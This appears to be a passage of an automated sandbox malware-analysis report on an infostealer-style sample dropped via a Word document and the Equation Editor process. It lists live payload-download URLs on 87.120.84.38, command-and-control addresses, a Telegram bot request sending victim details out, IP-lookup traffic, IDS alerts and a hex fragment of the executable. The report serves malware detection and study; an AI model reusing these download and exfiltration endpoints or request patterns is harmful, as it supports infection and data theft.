                  Source: Yara matchFile source: 5.2.cdlpohayugo39567.exe.3dd0dc8.2.raw.unpack, type: UNPACKEDPE
                  Source: global trafficHTTP traffic detected: HTTP/1.1 200 OKServer: nginx/1.26.2Date: Wed, 30 Oct 2024 07:19:41 GMTContent-Type: application/x-msdos-programContent-Length: 787968Connection: keep-aliveLast-Modified: Tue, 29 Oct 2024 06:19:00 GMTETag: "c0600-625978f9ea95d"Accept-Ranges: bytesData Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 50 45 00 00 4c 01 03 00 32 60 00 a3 00 00 00 00 00 00 00 00 e0 00 02 01 0b 01 30 00 00 fc 0b 00 00 08 00 00 00 00 00 00 2a 1a 0c 00 00 20 00 00 00 20 0c 00 00 00 40 00 00 20 00 00 00 02 00 00 04 00 00 00 00 00 00 00 04 00 00 00 00 00 00 00 00 60 0c 00 00 02 00 00 00 00 00 00 02 00 40 85 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 d8 19 0c 00 4f 00 00 00 00 20 0c 00 a4 05 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 0c 00 0c 00 00 00 00 f7 0b 00 70 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 08 00 00 00 00 00 00 00 00 00 00 00 08 20 00 00 48 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 30 fa 0b 00 00 20 00 00 00 fc 0b 00 00 02 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 72 73 72 63 00 00 00 a4 05 00 00 00 20 0c 00 00 06 00 00 00 fe 0b 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 65 6c 6f 63 00 00 0c 00 00 00 00 40 0c 00 00 02 00 00 00 04 0c 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 42 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 0c 1a 0c 00 00 00 00 00 48 00 00 00 02 00 05 00 b0 75 00 00 90 69 00 00 03 00 00 00 5e 00 00 06 40 df 00 00 c0 17 0b 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 1b 30 02 00 1d 00 00 00 00 00 00 00 02 28 1d 00 00 0a 00 00 00 02 28 06 00 00 06 7d 01 00 00 04 00 de 05 26 00 00 de 00 2a 00 00 00 01 10 00 00 00 00 08 00 0f 17 00 05 12 00 00 01 13 30 01 00 0c 00 00 00 01 00 00 11 00 02 7b 01 00 00 04 0a 2b 00 06 2a 1b 30 02 00 25 00 00 00 02 00 00 11 00 00 02 7b 01 00 00 04 03 6f 1e 00 00 0a 28 07 00 00 06 0a de 0d 26 00 72 01 00 00 70 73 1f 00 00 0a 7a 06 2a 00 00 00 01 10 00 00 00 00 01 00 15 16 00 0d 12 00 00 01 1b 30 02 00 29 00 00 00 03 00 00 11 00 00 03 04 28 09 00 00 06 0a 06 2c 0d 00 02 28 06 00 00 06 7d 01 00 00 04 00 02 7b 01 00 00 04 0b de 04 26 00 fe 1a 07 2a 00 00 00 01 10 00 00 00 00 01 00 22 23 00 04 12 00 00 01 1b 30 03 00 45 00 00 00 03 00 00 11 00 00 02 7b 01 00 00 04 05 03 6f 20 00 00 0a 00 05 04 02 7b 01 00 00 04 28 08 00 00 06 0a 06 2c 15 00 02 28 06 00 00 06 7d 01 00 00 04 02 7b 01 00 00 04 0b de 0d 02 7b 01 00 00 04 0b de 04 26 00 fe 1a 07 2a 00 00 00 01 10 00 00 00 00 01 00 3e
                  Source: global trafficHTTP traffic detected: GET /xml/173.254.250.78 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
                  Source: global trafficHTTP traffic detected: GET /xml/173.254.250.78 HTTP/1.1Host: reallyfreegeoip.org
                  Source: global trafficHTTP traffic detected: GET /xml/173.254.250.78 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
                  Source: global trafficHTTP traffic detected: GET /xml/173.254.250.78 HTTP/1.1Host: reallyfreegeoip.org
                  Source: global trafficHTTP traffic detected: GET /xml/173.254.250.78 HTTP/1.1Host: reallyfreegeoip.org
                  Source: global trafficHTTP traffic detected: GET /xml/173.254.250.78 HTTP/1.1Host: reallyfreegeoip.org
                  Source: global trafficHTTP traffic detected: GET /xml/173.254.250.78 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
                  Source: global trafficHTTP traffic detected: GET /xml/173.254.250.78 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
                  Source: global trafficHTTP traffic detected: GET /xml/173.254.250.78 HTTP/1.1Host: reallyfreegeoip.org
                  Source: global trafficHTTP traffic detected: GET /bot/sendMessage?chat_id=&text=%20%0D%0A%0D%0APC%20Name:960781%0D%0ADate%20and%20Time:%2010/30/2024%20/%2010:40:52%20PM%0D%0ACountry%20Name:%20United%20States%0D%0A%5B%20960781%20Clicked%20on%20the%20File%20If%20you%20see%20nothing%20this's%20mean%20the%20system%20storage's%20empty.%20%5D HTTP/1.1Host: api.telegram.orgConnection: Keep-Alive
                  Source: Joe Sandbox ViewIP Address: 132.226.8.169 132.226.8.169
                  Source: Joe Sandbox ViewIP Address: 149.154.167.220 149.154.167.220
                  Source: Joe Sandbox ViewASN Name: TELEGRAMRU TELEGRAMRU
                  Source: Joe Sandbox ViewASN Name: SHARCOM-ASBG SHARCOM-ASBG
                  Source: Joe Sandbox ViewJA3 fingerprint: 05af1f5ca1b87cc9cc9b25185115607d
                  Source: Joe Sandbox ViewJA3 fingerprint: 36f7277af969a6947a61ae0b815907a1
                  Source: C:\Users\user\AppData\Roaming\cdlpohayugo39567.exeDNS query: name: checkip.dyndns.org
                  Source: C:\Users\user\AppData\Roaming\cdlpohayugo39567.exeDNS query: name: checkip.dyndns.org
                  Source: C:\Users\user\AppData\Roaming\cdlpohayugo39567.exeDNS query: name: reallyfreegeoip.org
                  Source: C:\Users\user\AppData\Roaming\cdlpohayugo39567.exeDNS query: name: checkip.dyndns.org
                  Source: C:\Users\user\AppData\Roaming\cdlpohayugo39567.exeDNS query: name: checkip.dyndns.org
                  Source: C:\Users\user\AppData\Roaming\cdlpohayugo39567.exeDNS query: name: reallyfreegeoip.org
                  Source: C:\Users\user\AppData\Roaming\cdlpohayugo39567.exeDNS query: name: checkip.dyndns.org
                  Source: C:\Users\user\AppData\Roaming\cdlpohayugo39567.exeDNS query: name: checkip.dyndns.org
                  Source: C:\Users\user\AppData\Roaming\cdlpohayugo39567.exeDNS query: name: checkip.dyndns.org
                  Source: C:\Users\user\AppData\Roaming\cdlpohayugo39567.exeDNS query: name: reallyfreegeoip.org
                  Source: C:\Users\user\AppData\Roaming\cdlpohayugo39567.exeDNS query: name: checkip.dyndns.org
                  Source: C:\Users\user\AppData\Roaming\cdlpohayugo39567.exeDNS query: name: checkip.dyndns.org
                  Source: C:\Users\user\AppData\Roaming\cdlpohayugo39567.exeDNS query: name: reallyfreegeoip.org
                  Source: C:\Users\user\AppData\Roaming\cdlpohayugo39567.exeDNS query: name: checkip.dyndns.org
                  Source: C:\Users\user\AppData\Roaming\cdlpohayugo39567.exeDNS query: name: checkip.dyndns.org
                  Source: C:\Users\user\AppData\Roaming\cdlpohayugo39567.exeDNS query: name: reallyfreegeoip.org
                  Source: C:\Users\user\AppData\Roaming\cdlpohayugo39567.exeDNS query: name: checkip.dyndns.org
                  Source: C:\Users\user\AppData\Roaming\cdlpohayugo39567.exeDNS query: name: checkip.dyndns.org
                  Source: C:\Users\user\AppData\Roaming\cdlpohayugo39567.exeDNS query: name: reallyfreegeoip.org
                  Source: C:\Users\user\AppData\Roaming\cdlpohayugo39567.exeDNS query: name: checkip.dyndns.org
                  Source: C:\Users\user\AppData\Roaming\cdlpohayugo39567.exeDNS query: name: checkip.dyndns.org
                  Source: C:\Users\user\AppData\Roaming\cdlpohayugo39567.exeDNS query: name: reallyfreegeoip.org
                  Source: C:\Users\user\AppData\Roaming\cdlpohayugo39567.exeDNS query: name: checkip.dyndns.org
                  Source: C:\Users\user\AppData\Roaming\cdlpohayugo39567.exeDNS query: name: checkip.dyndns.org
                  Source: C:\Users\user\AppData\Roaming\cdlpohayugo39567.exeDNS query: name: checkip.dyndns.org
                  Source: C:\Users\user\AppData\Roaming\cdlpohayugo39567.exeDNS query: name: checkip.dyndns.org
                  Source: C:\Users\user\AppData\Roaming\cdlpohayugo39567.exeDNS query: name: reallyfreegeoip.org
                  Source: Network trafficSuricata IDS: 2803274 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UH : 192.168.2.22:49165 -> 132.226.8.169:80
                  Source: Network trafficSuricata IDS: 2803274 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UH : 192.168.2.22:49167 -> 132.226.8.169:80
                  Source: Network trafficSuricata IDS: 2803274 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UH : 192.168.2.22:49162 -> 132.226.8.169:80
                  Source: Network trafficSuricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.22:49168 -> 188.114.97.3:443
                  Source: Network trafficSuricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.22:49170 -> 188.114.97.3:443
                  Source: Network trafficSuricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.22:49179 -> 188.114.96.3:443
                  Source: Network trafficSuricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.22:49172 -> 188.114.96.3:443
                  Source: Network trafficSuricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.22:49164 -> 188.114.96.3:443
                  Source: global trafficHTTP traffic detected: GET /txt/qHbynE8Vgwabsy3.exe HTTP/1.1Accept: */*Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/7.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)Host: 87.120.84.38Connection: Keep-Alive
                  Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
                  Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
                  Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
                  Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
                  Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
                  Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
                  Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
                  Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
                  Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
                  Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
                  Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
                  Source: unknownHTTPS traffic detected: 188.114.96.3:443 -> 192.168.2.22:49163 version: TLS 1.0
                  Source: unknownTCP traffic detected without corresponding DNS query: 87.120.84.38
                  Source: unknownTCP traffic detected without corresponding DNS query: 87.120.84.38
                  Source: unknownTCP traffic detected without corresponding DNS query: 87.120.84.38
                  Source: unknownTCP traffic detected without corresponding DNS query: 87.120.84.38
                  Source: unknownTCP traffic detected without corresponding DNS query: 87.120.84.38
                  Source: unknownTCP traffic detected without corresponding DNS query: 87.120.84.38
                  Source: unknownTCP traffic detected without corresponding DNS query: 87.120.84.38
                  Source: unknownTCP traffic detected without corresponding DNS query: 87.120.84.38
                  Source: unknownTCP traffic detected without corresponding DNS query: 87.120.84.38
                  Source: unknownTCP traffic detected without corresponding DNS query: 87.120.84.38
                  Source: unknownTCP traffic detected without corresponding DNS query: 87.120.84.38
                  Source: unknownTCP traffic detected without corresponding DNS query: 87.120.84.38
                  Source: unknownTCP traffic detected without corresponding DNS query: 87.120.84.38
                  Source: unknownTCP traffic detected without corresponding DNS query: 87.120.84.38
                  Source: unknownTCP traffic detected without corresponding DNS query: 87.120.84.38
                  Source: unknownTCP traffic detected without corresponding DNS query: 87.120.84.38
                  Source: unknownTCP traffic detected without corresponding DNS query: 87.120.84.38
                  Source: unknownTCP traffic detected without corresponding DNS query: 87.120.84.38
                  Source: unknownTCP traffic detected without corresponding DNS query: 87.120.84.38
                  Source: unknownTCP traffic detected without corresponding DNS query: 87.120.84.38
                  Source: unknownTCP traffic detected without corresponding DNS query: 87.120.84.38
                  Source: unknownTCP traffic detected without corresponding DNS query: 87.120.84.38
                  Source: unknownTCP traffic detected without corresponding DNS query: 87.120.84.38
                  Source: unknownTCP traffic detected without corresponding DNS query: 87.120.84.38
                  Source: unknownTCP traffic detected without corresponding DNS query: 87.120.84.38
                  Source: unknownTCP traffic detected without corresponding DNS query: 87.120.84.38
                  Source: unknownTCP traffic detected without corresponding DNS query: 87.120.84.38
                  Source: unknownTCP traffic detected without corresponding DNS query: 87.120.84.38
                  Source: unknownTCP traffic detected without corresponding DNS query: 87.120.84.38
                  Source: unknownTCP traffic detected without corresponding DNS query: 87.120.84.38
                  Source: unknownTCP traffic detected without corresponding DNS query: 87.120.84.38
                  Source: unknownTCP traffic detected without corresponding DNS query: 87.120.84.38
                  Source: unknownTCP traffic detected without corresponding DNS query: 87.120.84.38
                  Source: unknownTCP traffic detected without corresponding DNS query: 87.120.84.38
                  Source: unknownTCP traffic detected without corresponding DNS query: 87.120.84.38
                  Source: unknownTCP traffic detected without corresponding DNS query: 87.120.84.38
                  Source: unknownTCP traffic detected without corresponding DNS query: 87.120.84.38
                  Source: unknownTCP traffic detected without corresponding DNS query: 87.120.84.38
                  Source: unknownTCP traffic detected without corresponding DNS query: 87.120.84.38
                  Source: unknownTCP traffic detected without corresponding DNS query: 87.120.84.38
                  Source: unknownTCP traffic detected without corresponding DNS query: 87.120.84.38
                  Source: unknownTCP traffic detected without corresponding DNS query: 87.120.84.38
                  Source: unknownTCP traffic detected without corresponding DNS query: 87.120.84.38
                  Source: unknownTCP traffic detected without corresponding DNS query: 87.120.84.38
                  Source: unknownTCP traffic detected without corresponding DNS query: 87.120.84.38
                  Source: unknownTCP traffic detected without corresponding DNS query: 87.120.84.38
                  Source: unknownTCP traffic detected without corresponding DNS query: 87.120.84.38
                  Source: unknownTCP traffic detected without corresponding DNS query: 87.120.84.38
                  Source: unknownTCP traffic detected without corresponding DNS query: 87.120.84.38
                  Source: unknownTCP traffic detected without corresponding DNS query: 87.120.84.38
                  Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEFile created: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.Word\~WRS{EA9386F2-5C34-4EE8-9432-0E98A6485B50}.tmpJump to behavior
                  Source: global trafficHTTP traffic detected: GET /xml/173.254.250.78 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
                  Source: global trafficHTTP traffic detected: GET /xml/173.254.250.78 HTTP/1.1Host: reallyfreegeoip.org
                  Source: global trafficHTTP traffic detected: GET /xml/173.254.250.78 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
                  Source: global trafficHTTP traffic detected: GET /xml/173.254.250.78 HTTP/1.1Host: reallyfreegeoip.org
                  Source: global trafficHTTP traffic detected: GET /xml/173.254.250.78 HTTP/1.1Host: reallyfreegeoip.org
                  Source: global trafficHTTP traffic detected: GET /xml/173.254.250.78 HTTP/1.1Host: reallyfreegeoip.org
                  Source: global trafficHTTP traffic detected: GET /xml/173.254.250.78 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
                  Source: global trafficHTTP traffic detected: GET /xml/173.254.250.78 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
                  Source: global trafficHTTP traffic detected: GET /xml/173.254.250.78 HTTP/1.1Host: reallyfreegeoip.org
                  Source: global trafficHTTP traffic detected: GET /bot/sendMessage?chat_id=&text=%20%0D%0A%0D%0APC%20Name:960781%0D%0ADate%20and%20Time:%2010/30/2024%20/%2010:40:52%20PM%0D%0ACountry%20Name:%20United%20States%0D%0A%5B%20960781%20Clicked%20on%20the%20File%20If%20you%20see%20nothing%20this's%20mean%20the%20system%20storage's%20empty.%20%5D HTTP/1.1Host: api.telegram.orgConnection: Keep-Alive
                  Source: global trafficHTTP traffic detected: GET /txt/qHbynE8Vgwabsy3.exe HTTP/1.1Accept: */*Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/7.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)Host: 87.120.84.38Connection: Keep-Alive
                  Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
                  Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
                  Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
                  Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
                  Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
                  Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
                  Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
                  Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
                  Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
                  Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
                  Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
                  Source: cdlpohayugo39567.exe, 00000007.00000002.910557349.0000000000554000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: www.login.yahoo.com0 equals www.yahoo.com (Yahoo)
                  Source: global trafficDNS traffic detected: DNS query: checkip.dyndns.org
                  Source: global trafficDNS traffic detected: DNS query: reallyfreegeoip.org
                  Source: global trafficDNS traffic detected: DNS query: api.telegram.org
                  Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.18.0Date: Wed, 30 Oct 2024 07:20:16 GMTContent-Type: application/jsonContent-Length: 55Connection: closeStrict-Transport-Security: max-age=31536000; includeSubDomains; preloadAccess-Control-Allow-Origin: *Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
                  Source: cdlpohayugo39567.exe, 00000005.00000002.407925121.0000000003BA9000.00000004.00000800.00020000.00000000.sdmp, cdlpohayugo39567.exe, 00000007.00000002.910514133.0000000000402000.00000040.00000400.00020000.00000000.sdmpString found in binary or memory: http://51.38.247.67:8081/_send_.php?LCapplication/x-www-form-urlencoded
                  Source: EQNEDT32.EXE, EQNEDT32.EXE, 00000002.00000003.403039735.0000000000610000.00000004.00000020.00020000.00000000.sdmp, EQNEDT32.EXE, 00000002.00000002.403118978.0000000000610000.00000004.00000020.00020000.00000000.sdmp, EQNEDT32.EXE, 00000002.00000002.403105661.00000000005CF000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://87.120.84.38/txt/qHbynE8Vgwabsy3.exe
                  Source: EQNEDT32.EXE, 00000002.00000003.403039735.0000000000610000.00000004.00000020.00020000.00000000.sdmp, EQNEDT32.EXE, 00000002.00000002.403118978.0000000000610000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://87.120.84.38/txt/qHbynE8Vgwabsy3.exeC:
                  Source: EQNEDT32.EXE, 00000002.00000002.403105661.00000000005CF000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://87.120.84.38/txt/qHbynE8Vgwabsy3.exeN
                  Source: EQNEDT32.EXE, 00000002.00000002.403105661.00000000005CF000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://87.120.84.38/txt/qHbynE8Vgwabsy3.exej
                  Source: EQNEDT32.EXE, 00000002.00000002.403105661.00000000005CF000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://87.120.84.38/txt/qHbynE8Vgwabsy3.exettC:
                  Source: cdlpohayugo39567.exe, 00000005.00000002.407925121.0000000003BA9000.00000004.00000800.00020000.00000000.sdmp, cdlpohayugo39567.exe, 00000007.00000002.911170867.0000000002531000.00000004.00000800.00020000.00000000.sdmp, cdlpohayugo39567.exe, 00000007.00000002.910514133.0000000000402000.00000040.00000400.00020000.00000000.sdmpString found in binary or memory: http://aborters.duckdns.org:8081
                  Source: cdlpohayugo39567.exe, 00000005.00000002.407925121.0000000003BA9000.00000004.00000800.00020000.00000000.sdmp, cdlpohayugo39567.exe, 00000007.00000002.911170867.0000000002531000.00000004.00000800.00020000.00000000.sdmp, cdlpohayugo39567.exe, 00000007.00000002.910514133.0000000000402000.00000040.00000400.00020000.00000000.sdmpString found in binary or memory: http://anotherarmy.dns.army:8081
                  Source: cdlpohayugo39567.exe, 00000007.00000002.911170867.00000000026F4000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://api.telegram.org
                  Source: cdlpohayugo39567.exe, 00000007.00000002.911170867.00000000025D2000.00000004.00000800.00020000.00000000.sdmp, cdlpohayugo39567.exe, 00000007.00000002.911170867.0000000002665000.00000004.00000800.00020000.00000000.sdmp, cdlpohayugo39567.exe, 00000007.00000002.911170867.00000000026D9000.00000004.00000800.00020000.00000000.sdmp, cdlpohayugo39567.exe, 00000007.00000002.911170867.000000000268F000.00000004.00000800.00020000.00000000.sdmp, cdlpohayugo39567.exe, 00000007.00000002.911170867.00000000026BD000.00000004.00000800.00020000.00000000.sdmp, cdlpohayugo39567.exe, 00000007.00000002.911170867.00000000026CB000.00000004.00000800.00020000.00000000.sdmp, cdlpohayugo39567.exe, 00000007.00000002.911170867.0000000002682000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://checkip.dyndns.com
                  Source: cdlpohayugo39567.exe, 00000007.00000002.911170867.00000000025D2000.00000004.00000800.00020000.00000000.sdmp, cdlpohayugo39567.exe, 00000007.00000002.911170867.000000000269D000.00000004.00000800.00020000.00000000.sdmp, cdlpohayugo39567.exe, 00000007.00000002.911170867.0000000002615000.00000004.00000800.00020000.00000000.sdmp, cdlpohayugo39567.exe, 00000007.00000002.911170867.0000000002665000.00000004.00000800.00020000.00000000.sdmp, cdlpohayugo39567.exe, 00000007.00000002.911170867.00000000026D9000.00000004.00000800.00020000.00000000.sdmp, cdlpohayugo39567.exe, 00000007.00000002.911170867.00000000025C3000.00000004.00000800.00020000.00000000.sdmp, cdlpohayugo39567.exe, 00000007.00000002.911170867.000000000268F000.00000004.00000800.00020000.00000000.sdmp, cdlpohayugo39567.exe, 00000007.00000002.911170867.00000000026BD000.00000004.00000800.00020000.00000000.sdmp, cdlpohayugo39567.exe, 00000007.00000002.911170867.00000000026CB000.00000004.00000800.00020000.00000000.sdmp, cdlpohayugo39567.exe, 00000007.00000002.911170867.0000000002682000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://checkip.dyndns.org
                  Source: cdlpohayugo39567.exe, 00000007.00000002.911170867.0000000002531000.00000004.00000800.00020000.00000000.sdmp, cdlpohayugo39567.exe, 00000007.00000002.910557349.0000000000554000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://checkip.dyndns.org/
                  Source: cdlpohayugo39567.exe, 00000005.00000002.407925121.0000000003BA9000.00000004.00000800.00020000.00000000.sdmp, cdlpohayugo39567.exe, 00000007.00000002.910514133.0000000000402000.00000040.00000400.00020000.00000000.sdmpString found in binary or memory: http://checkip.dyndns.org/q
                  Source: cdlpohayugo39567.exe, 00000007.00000002.912204117.0000000005A00000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl.comodoca.com/AAACertificateServices.crl06
                  Source: cdlpohayugo39567.exe, 00000007.00000002.910557349.0000000000554000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl.comodoca.com/UTN-USERFirst-Hardware.crl06
                  Source: cdlpohayugo39567.exe, 00000007.00000002.910557349.0000000000554000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl.entrust.net/2048ca.crl0
                  Source: cdlpohayugo39567.exe, 00000007.00000002.910557349.0000000000554000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl.entrust.net/server1.crl0
                  Source: cdlpohayugo39567.exe, 00000007.00000002.912204117.0000000005A00000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl.globalsign.net/root-r2.crl0
                  Source: cdlpohayugo39567.exe, 00000007.00000002.910557349.0000000000554000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl.pkioverheid.nl/DomOrganisatieLatestCRL-G2.crl0
                  Source: cdlpohayugo39567.exe, 00000007.00000002.910557349.0000000000554000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl.pkioverheid.nl/DomOvLatestCRL.crl0
                  Source: cdlpohayugo39567.exe, 00000007.00000002.910557349.0000000000554000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ocsp.comodoca.com0
                  Source: cdlpohayugo39567.exe, 00000007.00000002.910557349.0000000000554000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ocsp.comodoca.com0%
                  Source: cdlpohayugo39567.exe, 00000007.00000002.910557349.0000000000554000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ocsp.comodoca.com0-
                  Source: cdlpohayugo39567.exe, 00000007.00000002.910557349.0000000000554000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ocsp.comodoca.com0/
                  Source: cdlpohayugo39567.exe, 00000007.00000002.910557349.0000000000554000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ocsp.comodoca.com05
                  Source: cdlpohayugo39567.exe, 00000007.00000002.910557349.0000000000554000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ocsp.entrust.net03
                  Source: cdlpohayugo39567.exe, 00000007.00000002.910557349.0000000000554000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ocsp.entrust.net0D
